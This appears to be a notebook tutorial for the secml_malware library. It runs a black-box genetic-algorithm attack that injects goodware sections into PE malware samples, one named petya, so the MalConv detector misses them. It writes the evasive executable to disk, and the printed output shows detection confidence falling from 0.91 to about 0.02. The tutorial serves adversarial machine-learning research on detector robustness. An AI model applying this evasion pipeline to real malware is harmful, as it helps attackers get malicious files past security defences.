# Black-box attack Tutorial

In this tutorial, you will learn how to apply black-box attacks, using the Section Injection practical manipulation.

In [1]:
import os

import magic
import numpy as np
from secml.array import CArray

from secml_malware.attack.blackbox.c_wrapper_phi import CEnd2EndWrapperPhi
from secml_malware.attack.blackbox.ga.c_base_genetic_engine import CGeneticAlgorithm
from secml_malware.models.c_classifier_end2end_malware import CClassifierEnd2EndMalware
from secml_malware.models.malconv import MalConv

net = CClassifierEnd2EndMalware(MalConv())
net.load_pretrained_model()
net = CEnd2EndWrapperPhi(net)

Firstly, we have created the network (MalConv) and it has been passed wrapped with a *CClassifierEnd2EndMalware* model class.
This object generalizes PyTorch end-to-end ML models.
Since MalConv is already coded inside the plugin, the weights are also stored, and they can be retrieved with the *load_pretrained_model* method.

If you wish to use diffierent weights, pass the path to the PyTorch *pth* file to that method.

Then, we wrap it inside a `CEnd2EndWrapperPhi`, that is an interface that abstracts from the feature extraction phase of the model.
This is needed for the black-box settings of the attack.

In [2]:
from secml_malware.attack.blackbox.c_gamma_sections_evasion import CGammaSectionsEvasionProblem
goodware_folder = 'secml_malware/data/goodware_samples' #INSERT GOODWARE IN THAT FOLDER
section_population, what_from_who = CGammaSectionsEvasionProblem.create_section_population_from_folder(goodware_folder, how_many=10, sections_to_extract=['.rdata'])

attack = CGammaSectionsEvasionProblem(section_population, net, population_size=10, penalty_regularizer=1e-6, iterations=10, threshold=0)

For the section injection attack implemented with GAMMA, we need first to extract the goodware sections.
Then, we create a `CGammaSectionsEvasionProblem` object, that contains the attack.

In [3]:
folder = 'secml_malware/data/malware_samples/test_folder'  #INSERT MALWARE IN THAT FOLDER
X = []
y = []
file_names = []
for i, f in enumerate(os.listdir(folder)):
    path = os.path.join(folder, f)
    if "PE32" not in magic.from_file(path):
        continue
    with open(path, "rb") as file_handle:
        code = file_handle.read()
    x = CArray(np.frombuffer(code, dtype=np.uint8)).atleast_2d()
    _, confidence = net.predict(x, True)

    if confidence[0, 1].item() < 0.5:
        continue

    print(f"> Added {f} with confidence {confidence[0,1].item()}")
    X.append(x)
    conf = confidence[1][0].item()
    y.append([1 - conf, conf])
    file_names.append(path)

> Added p2.file with confidence 0.9112256765365601
> Added petya.file with confidence 0.9112256765365601
> Added p1.file with confidence 0.9112256765365601


We load a simple dataset from the `malware_samples/test_folder` that you have filled with malware to test the attacks.
We discard all the samples that are not seen by the network.
The `CArray` class is the base object you will handle when dealing with vectors in this library.

In [4]:
engine = CGeneticAlgorithm(attack)
for sample, label in zip(X, y):
    y_pred, adv_score, adv_ds, f_obj = engine.run(sample, CArray(label[1]))
    print(engine.confidences_)
    print(f_obj)

[0.9112256765365601, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433]
0.002221981529146433
[0.9112256765365601, 0.031418055295944214, 0.031418055295944214, 0.05943218246102333, 0.027438974007964134, 0.027438974007964134, 0.027438974007964134, 0.03099643439054489, 0.03099643439054489, 0.023107970133423805, 0.023107970133423805, 0.023107970133423805]
0.023107970133423805
[0.9112256765365601, 0.02237715944647789, 0.036044590175151825, 0.036044590175151825, 0.03532141447067261, 0.026757843792438507, 0.026757843792438507, 0.026757843792438507, 0.021750085055828094, 0.021750085055828094, 0.021750085055828094, 0.019729789346456528]
0.019729789346456528


Inside the `adv_ds` object, you can find the adversarial example computed by the attack.
You can reconstruct the functioning example by using a specific function inside the plugin:

In [5]:
adv_x = adv_ds.X[0,:]
engine.write_adv_to_file(adv_x,'adv_exe')
with open('adv_exe', 'rb') as h:
    code = h.read()
real_adv_x = CArray(np.frombuffer(code, dtype=np.uint8))
_, confidence = net.predict(CArray(real_adv_x), True)
print(confidence[0,1].item())

0.026793455705046654


... and you're done!
If you want to create a real sample (stored on disk), just have a look at the `create_real_sample_from_adv` of each attack. It accepts a third string argument that will be used as a destination file path for storing the adversarial example.